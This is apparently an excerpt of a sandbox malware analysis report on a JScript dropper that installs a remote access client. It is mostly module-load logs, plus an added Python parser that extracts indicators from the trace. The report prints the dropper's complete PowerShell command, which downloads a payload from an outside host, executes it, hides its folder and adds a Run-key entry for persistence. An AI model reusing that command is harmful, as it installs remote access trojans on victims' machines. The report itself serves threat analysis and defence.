Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pcihooks.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: riched32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pciinv.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: fwbase.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Section loaded: msasn1.dll
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\NSM.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: Update.jsStatic file information: File size 2698311 > 1048576
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp

                                Data Obfuscation

                                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject(qqq)}ITextStream.WriteLine(" exit:270473 f:parseInt r:501988");ITextStream.WriteLine(" entry:270487 f:_0x389d1d a0:459");ITextStream.WriteLine(" exit:270487 f:_0x389d1d r:%225COfPcB%22");ITextStream.WriteLine(" entry:270484 f:parseInt a0:%225COfPcB%22");ITextStream.WriteLine(" exit:270484 f:parseInt r:5");ITextStream.WriteLine(" entry:270498 f:_0x389d1d a0:462");ITextStream.WriteLine(" exit:270498 f:_0x389d1d r:%22885012SRCYSd%22");ITextStream.WriteLine(" entry:270495 f:parseInt a0:%22885012SRCYSd%22");ITextStream.WriteLine(" exit:270495 f:parseInt r:885012");ITextStream.WriteLine(" entry:270509 f:_0x389d1d a0:454");ITextStream.WriteLine(" exit:270509 f:_0x389d1d r:%222518607vmSqGw%22");ITextStream.WriteLine(" entry:270506 f:parseInt a0:%222518607vmSqGw%22");ITextStream.WriteLine(" exit:270506 f:parseInt r:2518607");ITextStream.WriteLine(" entry:270520 f:_0x389d1d a0:457");ITextStream.WriteLine(" exit:270520 f:_0x389d1d r:%228BsUHVp%22");ITextStream.WriteLine(" entry:270517 f:parseInt a0:%228BsUHVp%22");ITextStream.WriteLine(" exit:270517 f:parseInt r:8");ITextStream.WriteLine(" entry:270531 f:_0x389d1d a0:455");ITextStream.WriteLine(" exit:270531 f:_0x389d1d r:%22405Gvcfvd%22");ITextStream.WriteLine(" entry:270528 f:parseInt a0:%22405Gvcfvd%22");ITextStream.WriteLine(" exit:270528 f:parseInt r:405");ITextStream.WriteLine(" entry:270542 f:_0x389d1d a0:458");ITextStream.WriteLine(" exit:270542 f:_0x389d1d r:%2247870QkkIHq%22");ITextStream.WriteLine(" entry:270539 f:parseInt a0:%2247870QkkIHq%22");ITextStream.WriteLine(" exit:270539 f:parseInt r:47870");ITextStream.WriteLine(" entry:270552 f:_0x389d1d a0:465");ITextStream.WriteLine(" exit:270552 f:_0x389d1d r:%22418iDeVYT%22");ITextStream.WriteLine(" entry:270549 f:parseInt a0:%22418iDeVYT%22");ITextStream.WriteLine(" exit:270549 f:parseInt r:418");ITextStream.WriteLine(" entry:270563 f:_0x389d1d 
a0:470");ITextStream.WriteLine(" exit:270563 f:_0x389d1d r:%22377964dSLjeI%22");ITextStream.WriteLine(" entry:270560 f:parseInt a0:%22377964dSLjeI%22");ITextStream.WriteLine(" exit:270560 f:parseInt r:377964");ITextStream.WriteLine(" exit:270413 f: r:undefined");ITextStream.WriteLine(" entry:270674 f:_0x19514d a0:453");ITextStream.WriteLine(" exit:270674 f:_0x19514d r:%22https%3A%2F%2Fmoneymoj.com%2Fcdn-vs%2Fupdate.php%3F88%22");ITextStream.WriteLine(" entry:270671 f:dsd a0:%22https%3A%2F%2Fmoneymoj.com%2Fcdn-vs%2Fupdate.php%3F88%22");ITextStream.WriteLine(" exec:270609 f:dsd");ITextStream.WriteLine(" entry:270618 f:Function a0:%22qqq%22 a1:%22return%20WScript.CreateObject(qqq)%22");ITextStream.WriteLine(" exit:270618 f:Function r:function%20anonymous(qqq)");ITextStream.WriteLine(" entry:270628 f:_0x520536 a0:463");ITextStream.WriteLine(" exit:270628 f:_0x520536 r:%22MSXML2.ServerXMLHTTP.6.0%22");ITextStream.WriteLine(" entry:270625 f:aa a0:%22MSXML2.ServerXMLHTTP.6.0%22");IHost.CreateObject("MSXML2.ServerXMLHTTP.6.0");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:270
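The AMSI trace above is the most useful artifact in this section: the JScript is wrapped by a string-array obfuscator, so three accessor functions (`_0x389d1d`, `_0x19514d`, `_0x520536`) take a numeric index and return the real string, `Function("qqq","return WScript.CreateObject(qqq)")` hides the `CreateObject` call from static scanners, and the resolved ProgID `MSXML2.ServerXMLHTTP.6.0` is used to fetch `https://moneymoj.com/cdn-vs/update.php?88`. Because Joe Sandbox logs every entry/exit pair with percent-encoded arguments, the decoder table can be rebuilt from the trace without running the script. The following parser is an added example, not part of the report or the sample; the record format it assumes is inferred from the lines shown, and the sample trace is a constructed subset of those records.

```python
"""Recover decoded strings and IOCs from the Joe Sandbox AMSI trace of the JScript dropper.

Added example, not part of the sandbox report and not the sample's own code.
Assumed trace format, inferred from the report: each record is
ITextStream.WriteLine(" entry:<line> f:<func> a0:<arg> ...") or
ITextStream.WriteLine(" exit:<line> f:<func> r:<ret>"), with JScript string
values percent-encoded and wrapped in %22 quotes; numbers appear bare.
"""
import re
from urllib.parse import unquote

# Constructed sample: records copied from the trace above (one decoder call per
# string-array accessor, the parseInt self-check, the Function() wrapper and the
# ProgID lookup).
SAMPLE_TRACE = (
    'ITextStream.WriteLine(" entry:270487 f:_0x389d1d a0:459");'
    'ITextStream.WriteLine(" exit:270487 f:_0x389d1d r:%225COfPcB%22");'
    'ITextStream.WriteLine(" entry:270484 f:parseInt a0:%225COfPcB%22");'
    'ITextStream.WriteLine(" exit:270484 f:parseInt r:5");'
    'ITextStream.WriteLine(" entry:270674 f:_0x19514d a0:453");'
    'ITextStream.WriteLine(" exit:270674 f:_0x19514d r:%22https%3A%2F%2Fmoneymoj.com%2Fcdn-vs%2Fupdate.php%3F88%22");'
    'ITextStream.WriteLine(" entry:270618 f:Function a0:%22qqq%22 a1:%22return%20WScript.CreateObject(qqq)%22");'
    'ITextStream.WriteLine(" entry:270628 f:_0x520536 a0:463");'
    'ITextStream.WriteLine(" exit:270628 f:_0x520536 r:%22MSXML2.ServerXMLHTTP.6.0%22");'
)

# One WriteLine() record: kind, script line, function name, then the arg/ret fields.
RECORD_RE = re.compile(r'WriteLine\("\s*(entry|exit|exec):(\d+)\s+f:([^\s"]*)(.*?)"\)')
ARG_RE = re.compile(r'\b(a\d+|r):(\S+)')


def decode_value(raw):
    """Percent-decode one traced value. Returns (value, is_string): JScript
    strings arrive as %22...%22, so the quotes tell strings from numbers."""
    val = unquote(raw)
    if len(val) >= 2 and val[0] == '"' and val[-1] == '"':
        return val[1:-1], True
    return val, False


def parse_trace(text):
    """Split the trace into records: kind, source line, function, args, return."""
    records = []
    for m in RECORD_RE.finditer(text):
        kind, line, func, rest = m.groups()
        rec = {"kind": kind, "line": int(line), "func": func,
               "args": [], "ret": None, "ret_is_str": False, "strings": []}
        for name, raw in ARG_RE.findall(rest):
            val, is_str = decode_value(raw)
            if is_str:
                rec["strings"].append(val)
            if name == "r":
                rec["ret"], rec["ret_is_str"] = val, is_str
            else:
                rec["args"].append(val)
        records.append(rec)
    return records


def decoder_table(records):
    """Pair entry/exit records by (line, func). A call that takes one numeric
    argument and returns a string is a string-array accessor; the table maps
    (accessor, index) -> plaintext, which lets you deobfuscate the script
    statically by substituting every accessor call."""
    pending, table = {}, {}
    for rec in records:
        key = (rec["line"], rec["func"])
        if rec["kind"] == "entry":
            pending[key] = rec["args"]
        elif rec["kind"] == "exit" and key in pending:
            args = pending.pop(key)
            if len(args) == 1 and args[0].isdigit() and rec["ret_is_str"]:
                table[(rec["func"], int(args[0]))] = rec["ret"]
    return table


def extract_iocs(records):
    """Collect URLs and COM ProgIDs from every decoded string in the trace."""
    urls, progids = set(), set()
    for rec in records:
        for val in rec["strings"]:
            if re.match(r"https?://", val):
                urls.add(val)
            elif re.fullmatch(r"[A-Za-z]\w*(\.\w+)+", val):
                progids.add(val)
    return {"urls": sorted(urls), "progids": sorted(progids)}


if __name__ == "__main__":
    recs = parse_trace(SAMPLE_TRACE)
    for (func, idx), plain in sorted(decoder_table(recs).items()):
        print(f"{func}({idx}) -> {plain!r}")
    print(extract_iocs(recs))
```

Feed it the full trace rather than the excerpt and the decoder table covers every string the script resolved during the run; any index that never appears in the trace belongs to a branch the sandbox did not reach, which is worth a manual look.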
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Containe
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
